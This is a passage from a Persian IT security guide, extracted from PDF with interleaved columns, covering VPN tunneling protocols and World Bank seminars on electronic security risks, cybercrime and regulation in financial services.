‫ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﺑﻴﺮﻭﻥ ﺷﺒﻜﻪ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳـﺪ‪ .‬ﺑـﻪ ﻋﺒـﺎﺭﺕ ﺩﻳﮕـﺮ‬
‫ﻫﺮﭼﻨﺪ ﻛﺎﺭﺑﺮ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺨﺎﻃﺮ ﻭﺟﻮﺩ ‪ VPN‬ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺤﺘـﻮﺍﻱ‬
‫ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺑﺒﻴﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻤﭽﻨﺎﻥ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪ‬
‫ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﺗﻐﻴﻴـﺮ ﺩﻫـﺪ ﻛـﻪ‬
‫ﻇﺮﻓﻴﺖ ﺷﺒﻜﻪ ﺳﺮﺭﻳﺰ ﺷﻮﺩ ﻭ ﻋﻠﻴﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ‬
‫ﺳﺮﻭﻳﺲ ﺍﻧﺠـﺎﻡ ﮔﻴـﺮﺩ‪ .‬ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ‪ ،‬ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻭ‬
‫ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺍﺯ ﻋﻨﺎﺻــﺮ ﺣﻴــﺎﺗﻲ ﻳــﻚ ﺍﺗــﺼﺎﻝ ﺍﻣــﻦ ﻫــﺴﺘﻨﺪ‪ .‬ﺍﺯ‬
‫ﭘﺮﻭﺗﻜﻞ ﻧﻘﻄﻪ ﺑﻪ ﻧﻘﻄﻪ )‪ ٢١٩(PPP‬ﺑﺮﺍﻱ ﻣﺪﺕ ﻣﺪﻳـﺪﻱ ﺑﻌﻨـﻮﺍﻥ‬
‫ﭘﺮﻭﺗﻜﻞ ﺟﻬﺎﻧﻲ ﻻﻳﺔ ﺍﺗﺼﺎﻝ‪ ٢٢٠‬ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﺗﻮﻧﻞ ﻣﻴﺎﻥ ﺍﺑﺰﺍﺭﻫـﺎ‬
‫ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ؛ ﺍﻣﺎ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧـﻞ‬
‫‪٢٢٢‬‬
‫ﻧﻘﻄﻪ ﺑﻪ ﻧﻘﻄﻪ )‪٢٢١(PPTP‬ﻭ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧﻞ ﻻﻳـﺔ ﺩﻭ )‪(L2TP‬‬
‫‪٢٢٣‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬

‫‪217 Tunneling‬‬
‫‪ ۲۱۸‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ‪ IETF‬ﺩﺭﺣﺎﻝ ﺍﺻﻼﺡ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ‪ VPN‬ﺍﺳـﺖ ﺗـﺎ‬
‫‪ IPSec‬ﺭﺍ ﺍﻳﻤﻦﺗﺮ ﻭ ﻧﻴﺰ ﺑﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺳﺎﺯﮔﺎﺭ ﻛﻨﺪ‪.‬‬
‫‪219‬‬ ‫‪Point-to-Point Protocol‬‬
‫‪220‬‬ ‫‪Link Layer‬‬
‫‪221‬‬ ‫‪Point-to-Point Tunneling‬‬
‫‪222‬‬ ‫‪Layer 2 Tunneling Protocol‬‬
‫‪ ۲۲۳‬ﻣﻘﺎﻟﺔ ‪ Karen Bannas‬ﺑﺎ ﻋﻨﻮﺍﻥ "‪ "Safe Passage‬ﺩﺭ ﻣﺠﻠﺔ‬
‫‪ ،PC Magazine‬ﻫﻔــﺖ ﺷــﺮﻛﺖ ﺍﺭﺍﺋــﻪﺩﻫﻨــﺪﺓ ‪ VPN‬ﺭﺍ ﺑــﺮﺍﻱ‬
‫ﻣﺤﺼﻮﻻﺕ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺘﻮﺳﻂ ﺑـﺎ ﺑﻮﺩﺟـﻪﺍﻱ‬
‫ﺣﺪﻭﺩ ﺩﻩ ﻫﺰﺍﺭ ﺩﻻﺭ ﻛﻪ ﺑﻪ ‪ VPN‬ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺩﻓﺘـﺮ ﻣﺮﻛـﺰﻱ ﻭ‬
‫ﺷﻌﺒﻪﻫﺎ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪:‬‬
‫‪http://www.pcmag.com/‬‬
‫‪print_article/0,3048,a%3D12352,00.asp‬‬
‫‪٢١٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺭﺍ ﺗﺎ ﻣﺪﺗﻬﺎ ﻣﺎﻧﺪﮔﺎﺭ ﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ‪،‬‬


‫ﻧﻪﺗﻨﻬﺎ ﺗﻬﺪﻳﺪﺍﺗﻲ ﭼﻨـﺪﻭﺟﻬﻲ ﻣﺜـﻞ ‪ Code Red‬ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪،‬‬
‫ﺑﻠﻜﻪ ﺧﻄﺮ ﺣﻠﻘﻪﻫﺎﻱ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﻧﻔﻮﺫ ﻧﻴﺰ ﻣﺤﺘﻤﻞ ﺍﺳﺖ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺣﻠﻘـﻪﻫـﺎﻱ ﻋﻤﻠﻴـﺎﺕ ﻣﺠﺮﻣﺎﻧـﻪ ﺍﺯ ﻛﺎﺯﻳﻨﻮﻫـﺎﻱ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﻌﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﭘﻮﻟﺸﻮﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻃﺒﻖ ﺗﺨﻤـﻴﻦ‬ ‫ﻓﺼﻞ ﺳﻴﺰﺩﻫﻢ‬
‫ﺷﺮﻛﺖ ‪ ،Internet Data‬ﺣﺪﻭﺩ ‪ %۵۷‬ﻧﻔﻮﺫﻫـﺎ ﻋﻠﻴـﻪ ﺻـﻨﺎﻳﻊ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ‪ ،‬ﺑـﻪ ﻣـﻮﺍﺯﺍﺕ‬
‫ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬
‫ﭘﻴﭽﻴﺪﻩﺗﺮ ﺷﺪﻥ ﺭﻭﺷﻬﺎﻱ ﻧﻔﻮﺫ‪ ،‬ﺳﻄﺢ ﻣﻬﺎﺭﺕ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﺎﻫﺶ‬ ‫ﭘﻴﺮﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ‬
‫ﻣﻲ ﻳﺎﺑﺪ؛ ﭼﻮﻥ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺑﺮﺍﻱ ‪ download‬ﻭ‬
‫ﻛﺎﺭﺑﺮﺩ‪ ،‬ﺩﺭ ﺩﺳﺘﺮﺱ ﻫﻤﮕﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﺣﺘـﻲ ﻛـﺴﺎﻧﻴﻜﻪ ﺩﺍﻧـﺶ‬ ‫ﻛﻠﻴﺎﺕ‬
‫ﭼﻨﺪﺍﻥ ﻋﻤﻴﻘﻲ ﻧﺪﺍﺭﻧﺪ ﻧﻴﺰ ﺑﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻧﺎﺕ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻗـﺪﺍﻡ ﺑـﻪ‬
‫ﻧﻔﻮﺫﻫﺎﻱ ﺑﺰﺭﮒ ﻛﻨﻨﺪ‪.‬‬ ‫ﻣﺜﺎﻟﻬــﺎﻳﻲ ﻛــﻪ ﺍﺯ ﺭﺧﻨــﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ‪ ،‬ﺭﺍﻩﺣﻠﻬــﺎ ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ‬
‫ﻣﺒﺘﻜﺮﺍﻧﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﭘﻲ ﻣﯽﺁﻳﻨـﺪ‪ ،‬ﺑﺮﮔﺮﻓﺘـﻪ ﺍﺯ ﺩﻭ ﺳـﻤﻴﻨﺎﺭ‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﺨـﺼﻮﺹ ﺩﺭ ﻧﻔﻮﺫﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺮﮔﺰﺍﺭ ﺷﺪﻩﺍﻧﺪ ‪ -‬ﺳﻤﻴﻨﺎﺭ ﺍﻭﻝ ﺑﺎ‬
‫ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﻋﻠﻴﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻧﺠـﺎﻡ ﻣـﻲ ﮔﻴـﺮﺩ ﻏﺎﻟﺒـﹰﺎ ﻳـﺎ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻋﻨﻮﺍﻥ "ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ :‬ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ‬


‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ ﻭ ﻳﺎ ﺍﺧﺎﺫﻱ ﺑﻮﺩﻩﺍﻧﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮ ﻧﻴﺰ ﻋﺒﺎﺭﺗﻨـﺪ‬
‫ﻣﺎﻟﯽ" ﺩﺭ ‪ ۲۵‬ﺳﭙﺘﺎﻣﺒﺮ ‪ ،۲۰۰۲‬ﻭ "ﺍﻳﻤﻨﻲ ﻭ ﺟﺎﻣﻌﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ"‬
‫ﺍﺯ ‪ ،٢٢٧salami slicing‬ﺍﻧﺘﻘــﺎﻝ ﺳــﺮﻣﺎﻳﻪ‪ ،‬ﻭ ﺩﺳــﺘﻜﺎﺭﻱ ﺩﺭ‬
‫ﺩﺭ ‪ ۱۰‬ﺳــﭙﺘﺎﻣﺒﺮ ‪ .۲۰۰۳‬ﻓﻴﻠﻤﻬــﺎﯼ ﻭﻳــﺪﺋﻮﻳﻲ ﻫــﺮ ﺩﻭ ﺟﻠــﺴﻪ ﺍﺯ‬
‫ﺳــﻬﺎﻡ‪ .‬ﺩﺭ ﺁﺳــﻴﺎ‪ ،‬ﻧﻔﻮﺫﻫــﺎ ﻣﺘﻮﺟــﻪ ﺍﻫــﺪﺍﻑ ﻣــﺸﺨﺺ ﺑﺨــﺶ‬
‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ‪ ٢٢٤.‬ﺍﻳـﻦ ﻓـﺼﻞ ﺷـﺎﻣﻞ‬
‫ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻫﺪﺍﻑ ﺣﻴـﺎﺗﻲ ﺑﺨـﺸﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ ﺑـﻮﺩﻩ‬
‫ﻧﻜﺎﺕ ﻣﻬﻢ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭﻫﺎ ﻭ ﺗﻮﺿﻴﺤﺎﺕ ﻧﻤﺎﻳﻨـﺪﮔﺎﻥ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺷﺮﻛﺖﻛﻨﻨﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺤـــﺚ ﻣﻘـــﺪﻣﺎﺗﻲ ﻣﺨـــﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـــﻲ ﺑـــﻪ ﻣﻮﺿـــﻮﻉ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺑﺨـﺼﻮﺹ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪GSM‬‬ ‫ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺳﺎﻝ ‪:۲۰۰۲‬‬
‫ﻫﻢ ﭘﺮﺩﺍﺧﺖ‪ .‬ﺑﻪ ﺩﻭ ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ‬ ‫‪٢٢٥‬‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺣﻮﺯﺓ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‬
‫ﺑﻲﺳـﻴﻢ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ ﻋﺒـﺎﺭﺕ ﺑﻮﺩﻧـﺪ ﺍﺯ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎﻱ‬
‫ﺟﻠﺴﻪ ﺑﺎ ﻣﻘﺪﻣـﻪﺍﻱ ﺑـﺮ ﻣﺨـﺎﻃﺮﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ٢٢٦‬ﺁﻏـﺎﺯ ﺷـﺪ ﻭ‬
‫‪ gateway‬ﻭ ﺣﻤـﻼﺕ "‪ ."man in the middle‬ﻣـﻮﺭﺩ ﺩﻭﻡ‬
‫ﻣﻘﺎﻻﺕ ﺑﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻥ "ﺷﺒﻜﻪﻫﺎﻱ ﺑﺴﺘﻪ" ﺑﻪ "ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎﺯ"‬
‫ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﺑﺮﺟﻬﺎﻱ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺩﺭ ﺧﻼﻝ ﺩﻩ ﺳـﺎﻝ ﺍﺧﻴـﺮ ﺍﺷـﺎﺭﻩ ﺩﺍﺷـﺘﻨﺪ‪ .‬ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﺑـﺎﺯ‪،‬‬
‫ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤﺮﺍﻩ ﺗﺼﺪﻳﻖ ﻛﻨﻨﺪ‪.‬‬
‫ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬـﺎﻳﻲ ﻣﺜـﻞ ‪ SSL‬ﻛـﻪ ﺍﺧﻴـﺮﹰﺍ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺁﻥ‬
‫ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻗﻮﺍﻧﻴﻦ ﻭ ﺿﻮﺍﺑﻂ‬ ‫ﺷﻜﺴﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺗﻲ ﻣﻲﺷﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﺍﻣﺮ‬

‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﻗﻮﺍﻧﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﭘﻨﺞ ﺳﺎﻝ ﻗﺒﻞ ﭼﻨـﺪﺍﻥ‬


‫‪ ۲۲۴‬ﻓﺎﻳﻞ ﻭﻳﺪﺋﻮﻳﻲ ﺧﻼﺻﺔ ﻣﺬﺍﻛﺮﺍﺕ ﻧﺸـﺴﺘﻬﺎﻱ ﺳـﺎﻟﻬﺎﻱ ‪ ۲۰۰۲‬ﻭ ‪۲۰۰۳‬‬
‫ﻣﺮﺳﻮﻡ ﻧﺒﻮﺩﻧﺪ‪ ،‬ﺍﻣﺮﻭﺯ ﭼﻬﻞ ﻛﺸﻮﺭ ﺩﺍﺭﺍﻱ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻫـﺴﺘﻨﺪ ﻭ‬ ‫ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺘﺮﺗﻴﺐ ﺑﺎ ﺁﺩﺭﺳﻬﺎﻱ ﺯﻳـﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺍﻳــﻦ ﺭﻗــﻢ ﻧﻴــﺰ ﺩﺭﺣــﺎﻝ ﺍﻓــﺰﺍﻳﺶ ﺍﺳــﺖ‪ .‬ﻗــﻮﺍﻧﻴﻦ ﻣﺮﺑــﻮﻁ ﺑــﻪ‬ ‫ﻫﺴﺘﻨﺪ‪:‬‬
‫‪http://www.worldbank.org/wbi/B-Span/sub_e-‬‬
‫ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺣﻘﻮﻕ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ ﺍﺯ‬ ‫‪security.htm‬‬
‫ﺍﻫﻤﻴــﺖ ﺧﺎﺻــﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧــﺪ ﻭ ﺑــﺴﺮﻋﺖ ﺩﺭﺣــﺎﻝ ﮔــﺴﺘﺮﺵ‬ ‫‪http://www1.worldbank.org/finance‬‬
‫‪ ۲۲۵‬ﺍﻳﻦ ﺟﻠﺴﻪ ﺑﺎ ﺣﻀﻮﺭ ﺍﻋـﻀﺎﻱ ﮔـﺮﻭﻩ ﻳﻜﭙﺎﺭﭼـﻪﺳـﺎﺯﻱ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ‬
‫ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻣﻮﺿﻮﻋﺎﺕ ﻛﻠﻴﺪﻱ ﺍﻳﻦ ﺑﺤﺚ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬ ‫ﺑﺮﮔـﺰﺍﺭ ﺷﺪ‪ .‬ﺍﻋﻀـﺎﻱ ﺣﺎﺿﺮ ﺩﺭ ﺟﻠﺴـﻪ ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯ‪Thomas :‬‬
‫‪ ،Tom Kellerman ،Glaessner‬ﻭ ‪،Valerie McNevin‬‬
‫ﺑﻌﻼﻭﺓ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺭ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺍﺯ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺑﺮﺯﻳﻞ‪،‬‬
‫ﺷﻴﻠﻲ‪ ،‬ﻣﻜﺰﻳﻚ‪ ،‬ﺍﻭﻛﺮﺍﻳﻦ‪ ،‬ﺍﺳﻠﻮﻭﺍﻛﻲ‪ ،‬ﺳﻨﮕﺎﭘﻮﺭ‪ ،‬ﻛﺮﺓ ﺟﻨﻮﺑﻲ‪ ،‬ﻓﻴﻠﻴﭙـﻴﻦ‪،‬‬
‫‪ ۲۲۷‬ﺑﺮﺩﺍﺷﺖ ﻣﻘﺎﺩﻳﺮ ﺑﺴﻴﺎﺭ ﻛﻢ ﺍﺯ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺣـﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﻣﺨﺘﻠـﻒ‬ ‫ﻫﻨﮓﻛﻨﮓ‪ ،‬ﺳﺮﻳﻼﻧﻜﺎ‪ ،‬ﻭ ﺟﻤﻬﻮﺭﻱ ﺧﻠﻖ ﭼﻴﻦ‬
‫ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ‬ ‫‪226 E-Risk‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢١٦‬‬

‫ﻣﻤﻴﺰﻱ ﻭ ﺁﺯﻣﻮﻥ ﻓﺮﺁﻳﻨﺪﻫﺎ‪ .‬ﺑﺮﺍﻱ ﺗـﺴﺮﻳﻊ ﺭﻓـﻊ ﻭ ﺭﺟـﻮﻉ‬ ‫•‬ ‫ﺍﻋﺘﺒﺎﺭ ﺍﻣﻀﺎﻫﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛‬ ‫•‬
‫ﻛﺎﺭﻫﺎ ﺑﺎﻳﺪ ﻫﻤﻜﺎﺭﻱ ﻭﺳﻴﻌﻲ ﻣﻴﺎﻥ ﻫﻤﺔ ﻃﺮﻓﻬﺎﻱ ﺩﺭﮔﻴـﺮ‬ ‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ‪ ،‬ﻭ ﺍﻋـﻼﻡ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ‬ ‫•‬
‫ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺎﻧﻜﻬﺎﻱ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘـﺎ ﺩﺍﺭﺍﻱ‬ ‫ﺍﺟﺮﺍﻳﻲ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺍﻃﻼﻋﺎﺕ؛‬
‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻫﺎﻳﻲ ﺩﺭ ‪ Antigua‬ﻫــﺴﺘﻨﺪ‪ .‬ﺍﮔــﺮ ﺍﻳــﻦ‬ ‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣــﻦ ﭘﺮﺩﺍﺧــﺖ ﻣﻴــﺎﻥ ﺑﺎﻧﻜﻬــﺎ ﺑﺨــﺼﻮﺹ‬ ‫•‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ‪ ،‬ﺑﺎﻧﻚ ﻫﻢ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺍﺋـﻪ‬ ‫ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛‬
‫ﺧﺪﻣﺎﺕ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ ،‬ﻭ ﺍﮔﺮ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ ﻓﺮﺍﺑﺨـﺸﻲ ﺑـﺎ‬ ‫ﭘﻮﻟــﺸﻮﻳﻲ ﻭ ﺳــﻄﺢ ﻫﻤﻜــﺎﺭﻱ ﺑــﻴﻦ ﺍﻟﻤﻠﻠــﻲ ﻛــﻪ ﺑــﺮﺍﻱ‬ ‫•‬
‫ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﺷﻮﺩ‪ ،‬ﺍﻗﺪﺍﻣﺎﺕ ﻓﻮﺭﻳﺘﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨـﻪ ﺑـﻪ‬ ‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺁﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻭ‬
‫ﺗﻌﻮﻳﻖ ﻣﻲﺍﻓﺘﺪ‪.‬‬ ‫ﺗﻮﺳﻌﻪ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ‪ ،‬ﻛﻪ ﻣﻘﻮﻟﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ‬ ‫•‬
‫ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺠﺮﻣﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﻫﻤﻜــﺎﺭﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ‪ .‬ﻣﻤﻜــﻦ ﺍﺳــﺖ‬ ‫•‬
‫ﻣﺨﺎﻃﺮﺍﺗﻲ ﻛﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺟﻨﺒﺔ ﺣﻴﺜﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻣﻨﺠـﺮ‬ ‫ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻣﻨﺪ ﭘﺬﻳﺮﺵ ﺿﻮﺍﺑﻂ ﺗﻮﺳﻂ ﻋﻤﻮﻡ‪،‬‬
‫ﺑﻪ ﺧﻮﺩﺩﺍﺭﻱ ﺍﺯ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻥ ﺣﻮﺍﺩﺙ ﺷـﻮﻧﺪ‪ .‬ﺩﺭﻧﺘﻴﺠـﻪ‬ ‫ﺩﺳﺖ ﻛﺸﻴﺪﻥ ﺍﺯ ﺗﻜـﺮﻭﻱ ﻭ ﻳﻜـﻪﺗـﺎﺯﻱ‪ ،‬ﻭ ﺑـﺎﻻ ﺑـﻮﺩﻥ ﺩﺍﻧـﺶ‬
‫ﺑﺮﮔﺰﺍﺭﻱ ﻣﻴﺰﮔﺮﺩﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﺤـﺚ ﭘﻴﺮﺍﻣـﻮﻥ ﺿـﻮﺍﺑﻂ‬ ‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻗﺒﻞ ﻣﻴـﺎﻥ ﺻـﻨﺎﻳﻊ ﻣﺘﻔـﺎﻭﺕ ﺩﺭ‬
